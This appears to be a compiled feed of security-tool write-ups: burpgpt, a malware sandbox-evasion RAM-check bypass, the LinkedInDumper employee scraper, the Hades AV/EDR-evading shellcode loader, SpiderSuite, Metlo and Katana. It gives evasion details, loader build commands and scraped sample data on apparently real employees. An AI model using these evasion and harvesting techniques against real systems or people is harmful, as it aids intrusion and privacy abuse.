    • Enables granular control over the number of GPT tokens used in the analysis by allowing for precise adjustments of the maximum prompt length.
    • Offers users multiple OpenAI models to choose from, allowing them to select the one that best suits their needs.
    • Empowers users to customise prompts and unleash limitless possibilities for interacting with OpenAI models. Browse through the Example Use Cases for inspiration.
    • Integrates with Burp Suite, providing all native features for pre- and post-processing, including displaying analysis results directly within the Burp UI for efficient analysis.
    • Provides troubleshooting functionality via the native Burp Event Log, enabling users to quickly resolve communication issues with the OpenAI API.

    Requirements

    1. System requirements:
    • Operating System: Compatible with Linux, macOS, and Windows operating systems.

    • Java Development Kit (JDK): Version 11 or later.

    • Burp Suite Professional or Community Edition: Version 2023.3.2 or later.

      [!IMPORTANT] Please note that using any version lower than 2023.3.2 may result in a java.lang.NoSuchMethodError. It is crucial to use the specified version or a more recent one to avoid this issue.

    1. Build tool:
    • Gradle: Version 6.9 or later (recommended). The build.gradle file is provided in the project repository.
    1. Environment variables:
    • Set up the JAVA_HOME environment variable to point to the JDK installation directory.

    Please ensure that all system requirements, including a compatible version of Burp Suite, are met before building and running the project. Note that the project's external dependencies will be automatically managed and installed by Gradle during the build process. Adhering to the requirements will help avoid potential issues and reduce the need for opening new issues in the project repository.

    Installation

    1. Compilation

    1. Ensure you have Gradle installed and configured.

    2. Download the burpgpt repository:

      git clone https://github.com/aress31/burpgpt
      cd .\burpgpt\
    3. Build the standalone jar:

      ./gradlew shadowJar

    2. Loading the Extension Into Burp Suite

    To install burpgpt in Burp Suite, first go to the Extensions tab and click on the Add button. Then, select the burpgpt-all jar file located in the .\lib\build\libs folder to load the extension.

    Usage

    To start using burpgpt, users need to complete the following steps in the Settings panel, which can be accessed from the Burp Suite menu bar:

    1. Enter a valid OpenAI API key.
    2. Select a model.
    3. Define the max prompt size. This field controls the maximum prompt length sent to OpenAI to avoid exceeding the maxTokens of GPT models (typically around 2048 for GPT-3).
    4. Adjust or create custom prompts according to your requirements.

    Once configured as outlined above, the Burp passive scanner sends each request to the chosen OpenAI model via the OpenAI API for analysis, producing Informational-level severity findings based on the results.

    Prompt Configuration

    burpgpt enables users to tailor the prompt for traffic analysis using a placeholder system. To include relevant information, we recommend using these placeholders, which the extension handles directly, allowing dynamic insertion of specific values into the prompt:

    Placeholder Description
    {REQUEST} The scanned request.
    {URL} The URL of the scanned request.
    {METHOD} The HTTP request method used in the scanned request.
    {REQUEST_HEADERS} The headers of the scanned request.
    {REQUEST_BODY} The body of the scanned request.
    {RESPONSE} The scanned response.
    {RESPONSE_HEADERS} The headers of the scanned response.
    {RESPONSE_BODY} The body of the scanned response.
    {IS_TRUNCATED_PROMPT} A boolean value that is programmatically set to true or false to indicate whether the prompt was truncated to the Maximum Prompt Size defined in the Settings.

    These placeholders can be used in the custom prompt to dynamically generate a request/response analysis prompt that is specific to the scanned request.

    [!NOTE] > Burp Suite provides the capability to support arbitrary placeholders through the use of Session handling rules or extensions such as Custom Parameter Handler, allowing for even greater customisation of the prompts.

    Example Use Cases

    The following list of example use cases showcases the bespoke and highly customisable nature of burpgpt, which enables users to tailor their web traffic analysis to meet their specific needs.

    • Identifying potential vulnerabilities in web applications that use a crypto library affected by a specific CVE:

      Analyse the request and response data for potential security vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER}:

      Web Application URL: {URL}
      Crypto Library Name: {CRYPTO_LIBRARY_NAME}
      CVE Number: CVE-{CVE_NUMBER}
      Request Headers: {REQUEST_HEADERS}
      Response Headers: {RESPONSE_HEADERS}
      Request Body: {REQUEST_BODY}
      Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER} in the request and response data and report them.
    • Scanning for vulnerabilities in web applications that use biometric authentication by analysing request and response data related to the authentication process:

      Analyse the request and response data for potential security vulnerabilities related to the biometric authentication process:

      Web Application URL: {URL}
      Biometric Authentication Request Headers: {REQUEST_HEADERS}
      Biometric Authentication Response Headers: {RESPONSE_HEADERS}
      Biometric Authentication Request Body: {REQUEST_BODY}
      Biometric Authentication Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the biometric authentication process in the request and response data and report them.
    • Analysing the request and response data exchanged between serverless functions for potential security vulnerabilities:

      Analyse the request and response data exchanged between serverless functions for potential security vulnerabilities:

      Serverless Function A URL: {URL}
      Serverless Function B URL: {URL}
      Serverless Function A Request Headers: {REQUEST_HEADERS}
      Serverless Function B Response Headers: {RESPONSE_HEADERS}
      Serverless Function A Request Body: {REQUEST_BODY}
      Serverless Function B Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities in the data exchanged between the two serverless functions and report them.
    • Analysing the request and response data for potential security vulnerabilities specific to a Single-Page Application (SPA) framework:

      Analyse the request and response data for potential security vulnerabilities specific to the {SPA_FRAMEWORK_NAME} SPA framework:

      Web Application URL: {URL}
      SPA Framework Name: {SPA_FRAMEWORK_NAME}
      Request Headers: {REQUEST_HEADERS}
      Response Headers: {RESPONSE_HEADERS}
      Request Body: {REQUEST_BODY}
      Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the {SPA_FRAMEWORK_NAME} SPA framework in the request and response data and report them.

    Roadmap

    • Add a new field to the Settings panel that allows users to set the maxTokens limit for requests, thereby limiting the request size.
    • Add support for connecting to a local instance of the AI model, allowing users to run and interact with the model on their local machines, potentially improving response times and data privacy.
    • Retrieve the precise maxTokens value for each model to transmit the maximum allowable data and obtain the most extensive GPT response possible.
    • Implement persistent configuration storage to preserve settings across Burp Suite restarts.
    • Enhance the code for accurate parsing of GPT responses into the Vulnerability model for improved reporting.

    Project Information

    The extension is currently under development and we welcome feedback, comments, and contributions to make it even better.

    Sponsor

    If this extension has saved you time and hassle during a security assessment, consider showing some love by sponsoring a cup of coffee

    for the developer. It's the fuel that powers development, after all. Just hit that shiny Sponsor button at the top of the page or click here to contribute and keep the caffeine flowing.

    Reporting Issues

    Did you find a bug? Well, don't just let it crawl around! Let's squash it together like a couple of bug whisperers!

    Please report any issues on the GitHub issues tracker. Together, we'll make this extension as reliable as a cockroach surviving a nuclear apocalypse!

    Contributing

    Looking to make a splash with your mad coding skills?

    Awesome! Contributions are welcome and greatly appreciated. Please submit all PRs on the GitHub pull requests tracker. Together we can make this extension even more amazing!

    License

    See LICENSE.



    Bypass-Sandbox-Evasion - Bypass Malware Sandbox Evasion Ram Check

    By: Zion3R


    Sandboxes are commonly used to analyze malware. They provide a temporary, isolated, and secure environment in which to observe whether a suspicious file exhibits any malicious behavior. However, malware developers have also developed methods to evade sandboxes and analysis environments. One such method is to perform checks to determine whether the machine the malware is being executed on is being operated by a real user. One such check is the RAM size. If the RAM size is unrealistically small (e.g., 1GB), it may indicate that the machine is a sandbox. If the malware detects a sandbox, it will not execute its true malicious behavior and may appear to be a benign file

    Details

    • The GetPhysicallyInstalledSystemMemory API retrieves the amount of RAM that is physically installed on the computer from the SMBIOS firmware tables. It takes a PULONGLONG parameter and returns TRUE if the function succeeds, setting the TotalMemoryInKilobytes to a nonzero value. If the function fails, it returns FALSE.

         

    • The amount of physical memory retrieved by the GetPhysicallyInstalledSystemMemory function must be equal to or greater than the amount reported by the GlobalMemoryStatusEx function; if it is less, the SMBIOS data is malformed and the function fails with ERROR_INVALID_DATA, Malformed SMBIOS data may indicate a problem with the user's computer .

    • The register rcx holds the parameter TotalMemoryInKilobytes. To overwrite the jump address of GetPhysicallyInstalledSystemMemory, I use the following opcodes: mov qword ptr ss:[rcx],4193B840. This moves the value 4193B840 (or 1.1 TB) to rcx. Then, the ret instruction is used to pop the return address off the stack and jump to it, Therefore, whenever GetPhysicallyInstalledSystemMemory is called, it will set rcx to the custom value."



    LinkedInDumper - Tool To Dump Company Employees From LinkedIn API

    By: Zion3R

    Python 3 script to dump company employees from LinkedIn API

    Description

    LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.

    The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.


    Requirements

    LinkedInDumper talks with the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Doing it this way, even 2FA protected accounts are supported. Furthermore, you are tasked to provide a LinkedIn company URL to dump employees from.

    Retrieving LinkedIn Cookie

    1. Sign into www.linkedin.com and retrieve your li_at session cookie value e.g. via developer tools
    2. Specify the cookie value either persistently in the python script's variable li_at or temporarily during runtime via the CLI flag --cookie

    Retrieving LinkedIn Company URL

    1. Search your target company on Google Search or directly on LinkedIn
    2. The LinkedIn company URL should look something like this: https://www.linkedin.com/company/apple

    Usage

    usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]

    options:
    -h, --help show this help message and exit
    --url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
    --cookie <cookie> LinkedIn 'li_at' session cookie
    --quiet Show employee results only
    --include-private-profiles
    Show private accounts too
    --email-format Python string format for emails; for example:
    [1] john.doe@example.com > '{0}.{1}@example.com'
    [2] j.doe@example.com > '{0[0]}.{1}@example.com'
    [3] jdoe@example.com > '{0[0]}{1}@example.com'
    [4] doe@example.com > '{1}@example.com'
    [5] john@example.com > '{0}@example.com'
    [6] jd@example.com > '{0[0]}{1[0]}@example.com'

    Example 1 - Docker Run

    docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

    Example 2 - Native Python

    # install dependencies
    pip install -r requirements.txt

    python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

    Outputs

    The script will return employee data as semi-colon separated values (like CSV):

     ██▓     ██▓ ███▄    █  ██ ▄█▀▓█████ ▓█████▄  ██▓ ███▄    █ ▓█████▄  █    ██  ███▄ ▄███▓ ██▓███  ▓█████  ██▀███  
    ▓██▒ ▓██▒ ██ ▀█ █ ██▄█▒ ▓█ ▀ ▒██▀ ██▌▓██▒ ██ ▀█ █ ▒██▀ ██▌ ██ ▓██▒▓██▒▀█& #9600; ██▒▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒
    ▒██░ ▒██▒▓██ ▀█ ██▒▓███▄░ ▒███ ░██ █▌▒██▒▓██ ▀█ ██▒░██ █▌▓██ ▒██░▓██ ▓██░▓██░ ██▓▒▒███ ▓██ ░▄█ ▒
    ▒██░ ░██░▓██▒ ▐▌██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌&# 9617;██░▓██▒ ▐▌██▒░▓█▄ ▌▓▓█ ░██░▒██ ▒██ ▒██▄█▓▒ ▒▒▓█ ▄ ▒██▀▀█▄
    ░██████▒░██░▒██░ ▓██░▒██▒ █▄░▒████▒░▒████▓ ░██░▒██░ ▓██░░▒████▓ ▒▒█████▓ ▒██▒ ░██▒▒██▒ ░ ░░▒████& #9618;░██▓ ▒██▒
    ░ ▒░▓ ░░▓ ░ ▒░ ▒ ▒ ▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ ░▓ ░ ▒░ ▒ ▒ ▒▒▓ ▒ ░▒▓▒ ▒ ▒ ░ ▒░ ░ ░▒▓▒░ ░ ░░░ ▒░ ░░ ▒▓ ░▒▓░
    ░ ░ ▒ ░ ▒ ░░ ░░ ░ ▒░░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ ▒ ░░ ░░ ░ ▒░ ░ ▒ ▒ ░░▒░ ░ ░ ░ ░ ░░▒ ░ ░ ░ ░ ░▒ ░ ▒░
    ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░░ ░ ░░ ░
    ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
    ░ ░ ░ by LRVT

    [i] Company Name: apple
    [i] Company X-ID: 162479
    [i] LN Employees: 1000 employees found
    [i] Dumping Date: 17/10/2022 13:55:06
    [i] Email Format: {0}.{1}@apple.de
    Firstname;Lastname;Email;Position;Gender;Location;Profile
    Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
    Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter

    [i] Successfully crawled 2 unique apple employee(s). Hurray ^_-

    Limitations

    LinkedIn will allow only the first 1,000 search results to be returned when harvesting contact information. You may also need a LinkedIn premium account when you reached the maximum allowed queries for visiting profiles with your freemium LinkedIn account.

    Furthermore, not all employee profiles are public. The results vary depending on your used LinkedIn account and whether you are befriended with some employees of the company to crawl or not. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile url of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" in the lastname. If you want to include such private profiles, please use the CLI flag --include-private-profiles. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.

    Finally, LinkedIn users are free to name their profile. An account name can therefore consist of various things such as saluations, abbreviations, emojis, middle names etc. I tried my best to remove some nonsense. However, this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API. This script gathers information from the "unofficial" Voyager API.



    Hades - Go Shellcode Loader That Combines Multiple Evasion Techniques

    By: Zion3R


    Hades is a proof of concept loader that combines several evasion technques with the aim of bypassing the defensive mechanisms commonly used by modern AV/EDRs.


    Usage

    The easiest way, is probably building the project on Linux using make.

    git clone https://github.com/f1zm0/hades && cd hades
    make

    Then you can bring the executable to a x64 Windows host and run it with .\hades.exe [options].

    PS > .\hades.exe -h

    '||' '||' | '||''|. '||''''| .|'''.|
    || || ||| || || || . ||.. '
    ||''''|| | || || || ||''| ''|||.
    || || .''''|. || || || . '||
    .||. .||. .|. .||. .||...|' .||.....| |'....|'

    version: dev [11/01/23] :: @f1zm0

    Usage:
    hades -f <filepath> [-t selfthread|remotethread|queueuserapc]

    Options:
    -f, --file <str> shellcode file path (.bin)
    -t, --technique <str> injection technique [selfthread, remotethread, queueuserapc]

    Example:

    Inject shellcode that spawms calc.exe with queueuserapc technique:

    .\hades.exe -f calc.bin -t queueuserapc

    Showcase

    User-mode hooking bypass with syscall RVA sorting (NtQueueApcThread hooked with frida-trace and custom handler)

    Instrumentation callback bypass with indirect syscalls (injected DLL is from syscall-detect by jackullrich)

    Additional Notes

    Direct syscall version

    In the latest release, direct syscall capabilities have been replaced by indirect syscalls provided by acheron. If for some reason you want to use the previous version of the loader that used direct syscalls, you need to explicitly pass the direct_syscalls tag to the compiler, which will figure out what files needs to be included and excluded from the build.

    GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -tags='direct_syscalls' -o dist/hades_directsys.exe cmd/hades/main.go

    Disclaimers

    Warning
    This project has been created for educational purposes only, to experiment with malware dev in Go, and learn more about the unsafe package and the weird Go Assembly syntax. Don't use it to on systems you don't own. The developer of this project is not responsible for any damage caused by the improper use of this tool.

    Credits

    Shoutout to the following people that shared their knowledge and code that inspired this tool:

    License

    This project is licensed under the GPLv3 License - see the LICENSE file for details



    SpiderSuite - Advance Web Spider/Crawler For Cyber Security Professionals

    By: Zion3R


    An advance cross-platform and multi-feature GUI web spider/crawler for cyber security proffesionals. Spider Suite can be used for attack surface mapping and analysis. For more information visit SpiderSuite's website.


    Installation and Usage

    Spider Suite is designed for easy installation and usage even for first timers.

    • First, download the package of your choice.

    • Then install the downloaded SpiderSuite package.

    • See First time crawling with SpiderSuite article for tutorial on how to get started.

    For complete documentation of Spider Suite see wiki.

    Contributing

    Can you translate?

    Visit SpiderSuite's translation project to make translations to your native language.

    Not a developer?

    You can help by reporting bugs, requesting new features, improving the documentation, sponsoring the project & writing articles.

    For More information see contribution guide.

    Contributers

    Credits

    This product includes software developed by the following open source projects:



    Metlo - An Open-Source API Security Platform

    By: Zion3R

    Secure Your API.


    Metlo is an open-source API security platform

    With Metlo you can:

    • Create an Inventory of all your API Endpoints and Sensitive Data.
    • Detect common API vulnerabilities.
    • Proactively test your APIs before they go into production.
    • Detect API attacks in real time.

    Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.


    There are three ways to get started with Metlo. Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users as it scales to 100s of millions of requests per month and all upgrades and migrations are managed for you.

    You can get started with Melto Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.

    Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system you can self host Metlo as well! Create an account on https://my.metlo.com and follow the instructions on our docs here to setup Metlo in your own Cloud environment.

    If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.

    You can also join our Discord community if you need help or just want to chat!

    Features

    • Endpoint Discovery - Metlo scans network traffic and creates an inventory of every single endpoint in your API.
    • Sensitive Data Scannning - Each endpoint is scanned for PII data and given a risk score.
    • Vulnerability Discovery - Get Alerts for issues like unauthenticated endpoints returning sensitive data, No HSTS headers, PII data in URL params, Open API Spec Diffs and more
    • API Security Testing - Build security tests directly in Metlo. Autogenerate tests for OWASP Top 10 vulns like BOLA, Broken Authentication, SQL Injection and more.
    • CI/CD Integration - Integrate with your CI/CD to find issues in development and staging.
    • Attack Detection - Our ML Algorithms build a model for baseline API behavior. Any deviation from this baseline is surfaced to your security team as soon as possible.
    • Attack Context - Metlo’s UI gives you full context around any attack to help quickly fix the vulnerability.

    Testing

    For tests that we can't autogenerate, our built in testing framework helps you get to 100% Security Coverage on your highest risk APIs. You can build tests in a yaml format to make sure your API is working as intendend.

    For example the following test checks for broken authentication:

    id: test-payment-processor-metlo.com-user-billing

    meta:
    name: test-payment-processor.metlo.com/user/billing Test Auth
    severity: CRITICAL
    tags:
    - BROKEN_AUTHENTICATION

    test:
    - request:
    method: POST
    url: https://test-payment-processor.metlo.com/user/billing
    headers:
    - name: Content-Type
    value: application/json
    - name: Authorization
    value: ...
    data: |-
    { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
    - key: resp.status
    value: 200
    - request:
    method: POST
    url: https://test-payment-processor.metlo.com/user/billing
    headers:
    - name: Content-Type
    value: application/json
    data: |-
    { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
    - key: resp.s tatus
    value: [ 401, 403 ]

    You can see more information on our docs.

    Why Metlo?

    Most businesses have adopted public facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. There’s been a 200% increase in API security breaches in just the last year with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure but there's no great solution on the market.

    Some solutions require you to go through sales calls to even try the product while others have you to send all your API traffic to their own cloud. Metlo is the first Open Source API security platform that you can self host, and get started for free right away!

    We're Hiring!

    We would love for you to come help us make Metlo better. Come join us at Metlo!

    Open-source vs. paid

    This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.

    Development

    Checkout our development guide for more info on how to develop Metlo locally.



    Katana - A Next-Generation Crawling And Spidering Framework


    A next-generation crawling and spidering framework

    FeaturesInstallationUsageScopeConfigFiltersJoin Discord

    Features

    • Fast And fully configurable web crawling
    • Standard and Headless mode support
    • JavaScript parsing / crawling
    • Customizable automatic form filling
    • Scope control - Preconfigured field / Regex
    • Customizable output - Preconfigured fields
    • INPUT - STDIN, URL and LIST
    • OUTPUT - STDOUT, FILE and JSON

    Installation

    katana requires Go 1.18 to install successfully. To install, just run the below command or download pre-compiled binary from release page.

    go install github.com/projectdiscovery/katana/cmd/katana@latest

    Usage

    katana -h

    This will display help for the tool. Here are all the switches it supports.

    Usage:
    ./katana [flags]

    Flags:
    INPUT:
    -u, -list string[] target url / list to crawl

    CONFIGURATION:
    -d, -depth int maximum depth to crawl (default 2)
    -jc, -js-crawl enable endpoint parsing / crawling in javascript file
    -ct, -crawl-duration int maximum duration to crawl the target for
    -kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
    -mrs, -max-response-size int maximum response size to read (default 2097152)
    -timeout int time to wait for request in seconds (default 10)
    -aff, -automatic-form-fill enable optional automatic form filling (experimental)
    -retry int number of times to retry the request (default 1)
    -proxy string http/socks5 proxy to use
    -H, -headers string[] custom hea der/cookie to include in request
    -config string path to the katana configuration file
    -fc, -form-config string path to custom form configuration file

    DEBUG:
    -health-check, -hc run diagnostic check up
    -elog, -error-log string file to write sent requests error log

    HEADLESS:
    -hl, -headless enable headless hybrid crawling (experimental)
    -sc, -system-chrome use local installed chrome browser instead of katana installed
    -sb, -show-browser show the browser on the screen with headless mode
    -ho, -headless-options string[] start headless chrome with additional options
    -nos, -no-sandbox start headless chrome in --no-sandbox mode
    -scp, -system-chrome-path string use specified chrome binary path for headless crawling
    -noi, -no-incognito start headless chrome without incognito mode

    SCOPE:
    -cs, -crawl-scope string[] in scope url regex to be followed by crawler
    -cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
    -fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
    -ns, -no-scope disables host based default scope
    -do, -display-out-scope display external endpoint from scoped crawling

    FILTER:
    -f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
    -sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
    -em, -extension-match string[] match output for given extension (eg, -em php,html,js)
    -ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)

    RATE-LIMIT:
    -c, -concurrency int number of concurrent fetchers to use (defaul t 10)
    -p, -parallelism int number of concurrent inputs to process (default 10)
    -rd, -delay int request delay between each request in seconds
    -rl, -rate-limit int maximum requests to send per second (default 150)
    -rlm, -rate-limit-minute int maximum number of requests to send per minute

    OUTPUT:
    -o, -output string file to write output to
    -j, -json write output in JSONL(ines) format
    -nc, -no-color disable output content coloring (ANSI escape codes)
    -silent display output only
    -v, -verbose display verbose output
    -version display project version

    Running Katana

    Input for katana

    katana requires url or endpoint to crawl and accepts single or multiple inputs.

    Input URL can be provided using -u option, and multiple values can be provided using comma-separated input, similarly file input is supported using -list option and additionally piped input (stdin) is also supported.

    URL Input

    katana -u https://tesla.com

    Multiple URL Input (comma-separated)

    katana -u https://tesla.com,https://google.com

    List Input

    $ cat url_list.txt

    https://tesla.com
    https://google.com
    katana -list url_list.txt

    STDIN (piped) Input

    echo https://tesla.com | katana
    cat domains | httpx | katana

    Example running katana -

    katana -u https://youtube.com

    __ __
    / /_____ _/ /____ ____ ___ _
    / '_/ _ / __/ _ / _ \/ _ /
    /_/\_\\_,_/\__/\_,_/_//_/\_,_/ v0.0.1

    projectdiscovery.io

    [WRN] Use with caution. You are responsible for your actions.
    [WRN] Developers assume no liability and are not responsible for any misuse or damage.
    https://www.youtube.com/
    https://www.youtube.com/about/
    https://www.youtube.com/about/press/
    https://www.youtube.com/about/copyright/
    https://www.youtube.com/t/contact_us/
    https://www.youtube.com/creators/
    https://www.youtube.com/ads/
    https://www.youtube.com/t/terms
    https://www.youtube.com/t/privacy
    https://www.youtube.com/about/policies/
    https://www.youtube.com/howyoutubeworks?utm_campaign=ytgen&utm_source=ythp&utm_medium=LeftNav&utm_content=txt&u=https%3A%2F%2Fwww.youtube.com %2Fhowyoutubeworks%3Futm_source%3Dythp%26utm_medium%3DLeftNav%26utm_campaign%3Dytgen
    https://www.youtube.com/new
    https://m.youtube.com/
    https://www.youtube.com/s/desktop/4965577f/jsbin/desktop_polymer.vflset/desktop_polymer.js
    https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-home-page-skeleton.css
    https://www.youtube.com/s/desktop/4965577f/cssbin/www-onepick.css
    https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.0Zo5FUcPkCg.L.B1.O/am=gAE/d=0/rs=AGKMywG5nh5Qp-BGPbOaI1evhF5BVGRZGA
    https://www.youtube.com/opensearch?locale=en_GB
    https://www.youtube.com/manifest.webmanifest
    https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-watch-page-skeleton.css
    https://www.youtube.com/s/desktop/4965577f/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
    https://w ww.youtube.com/s/desktop/4965577f/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/scheduler.vflset/scheduler.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/www-i18n-constants-en_GB.vflset/www-i18n-constants.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/www-tampering.vflset/www-tampering.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/spf.vflset/spf.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/network.vflset/network.js
    https://www.youtube.com/howyoutubeworks/
    https://www.youtube.com/trends/
    https://www.youtube.com/jobs/
    https://www.youtube.com/kids/

    Crawling Mode

    Standard Mode

    Standard crawling modality uses the standard go http library under the hood to handle HTTP requests/responses. This modality is much faster as it doesn't have the browser overhead. Still, it analyzes HTTP responses body as is, without any javascript or DOM rendering, potentially missing post-dom-rendered endpoints or asynchronous endpoint calls that might happen in complex web applications depending, for example, on browser-specific events.

    Headless Mode

    Headless mode hooks internal headless calls to handle HTTP requests/responses directly within the browser context. This offers two advantages:

    • The HTTP fingerprint (TLS and user agent) fully identify the client as a legitimate browser
    • Better coverage since the endpoints are discovered analyzing the standard raw response, as in the previous modality, and also the browser-rendered one with javascript enabled.

    Headless crawling is optional and can be enabled using -headless option.

    Here are other headless CLI options -

    katana -h headless

    Flags:
    HEADLESS:
    -hl, -headless enable experimental headless hybrid crawling
    -sc, -system-chrome use local installed chrome browser instead of katana installed
    -sb, -show-browser show the browser on the screen with headless mode
    -ho, -headless-options string[] start headless chrome with additional options
    -nos, -no-sandbox start headless chrome in --no-sandbox mode
    -noi, -no-incognito start headless chrome without incognito mode

    -no-sandbox

    Runs headless chrome browser with no-sandbox option, useful when running as root user.

    katana -u https://tesla.com -headless -no-sandbox

    -no-incognito

    Runs headless chrome browser without incognito mode, useful when using the local browser.

    katana -u https://tesla.com -headless -no-incognito

    -headless-options

    When crawling in headless mode, additional chrome options can be specified using -headless-options, for example -

    katana -u https://tesla.com -headless -system-chrome -headless-options --disable-gpu,proxy-server=http://127.0.0.1:8080

    Scope Control

    Crawling can be endless if not scoped, as such katana comes with multiple support to define the crawl scope.

    -field-scope

    Most handy option to define scope with predefined field name, rdn being default option for field scope.

    • rdn - crawling scoped to root domain name and all subdomains (e.g. *example.com) (default)
    • fqdn - crawling scoped to given sub(domain) (e.g. www.example.com or api.example.com)
    • dn - crawling scoped to domain name keyword (e.g. example)
    katana -u https://tesla.com -fs dn

    -crawl-scope

    For advanced scope control, -cs option can be used that comes with regex support.

    katana -u https://tesla.com -cs login

    For multiple in scope rules, file input with multiline string / regex can be passed.

    $ cat in_scope.txt

    login/
    admin/
    app/
    wordpress/
    katana -u https://tesla.com -cs in_scope.txt

    -crawl-out-scope

    For defining what not to crawl, -cos option can be used and also support regex input.

    katana -u https://tesla.com -cos logout

    For multiple out of scope rules, file input with multiline string / regex can be passed.

    $ cat out_of_scope.txt

    /logout
    /log_out
    katana -u https://tesla.com -cos out_of_scope.txt

    -no-scope

    Katana is default to scope *.domain, to disable this -ns option can be used and also to crawl the internet.

    katana -u https://tesla.com -ns

    -display-out-scope

    As default, when scope option is used, it also applies for the links to display as output, as such external URLs are default to exclude and to overwrite this behavior, -do option can be used to display all the external URLs that exist in targets scoped URL / Endpoint.

    katana -u https://tesla.com -do

    Here is all the CLI options for the scope control -

    katana -h scope

    Flags:
    SCOPE:
    -cs, -crawl-scope string[] in scope url regex to be followed by crawler
    -cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
    -fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
    -ns, -no-scope disables host based default scope
    -do, -display-out-scope display external endpoint from scoped crawling

    Crawler Configuration

    Katana comes with multiple options to configure and control the crawl as the way we want.

    -depth

    Option to define the depth to follow the urls for crawling, the more depth the more number of endpoint being crawled + time for crawl.

    katana -u https://tesla.com -d 5

    -js-crawl

    Option to enable JavaScript file parsing + crawling the endpoints discovered in JavaScript files, disabled as default.

    katana -u https://tesla.com -jc

    -crawl-duration

    Option to predefined crawl duration, disabled as default.

    katana -u https://tesla.com -ct 2

    -known-files

    Option to enable crawling robots.txt and sitemap.xml file, disabled as default.

    katana -u https://tesla.com -kf robotstxt,sitemapxml

    -automatic-form-fill

    Option to enable automatic form filling for known / unknown fields, known field values can be customized as needed by updating form config file at $HOME/.config/katana/form-config.yaml.

    Automatic form filling is experimental feature.

       -aff, -automatic-form-fill  enable optional automatic form filling (experimental)

    There are more options to configure when needed, here is all the config related CLI options -

    katana -h config

    Flags:
    CONFIGURATION:
    -d, -depth int maximum depth to crawl (default 2)
    -jc, -js-crawl enable endpoint parsing / crawling in javascript file
    -ct, -crawl-duration int maximum duration to crawl the target for
    -kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
    -mrs, -max-response-size int maximum response size to read (default 2097152)
    -timeout int time to wait for request in seconds (default 10)
    -retry int number of times to retry the request (default 1)
    -proxy string http/socks5 proxy to use
    -H, -headers string[] custom header/cookie to include in request
    -config string path to the katana configuration file
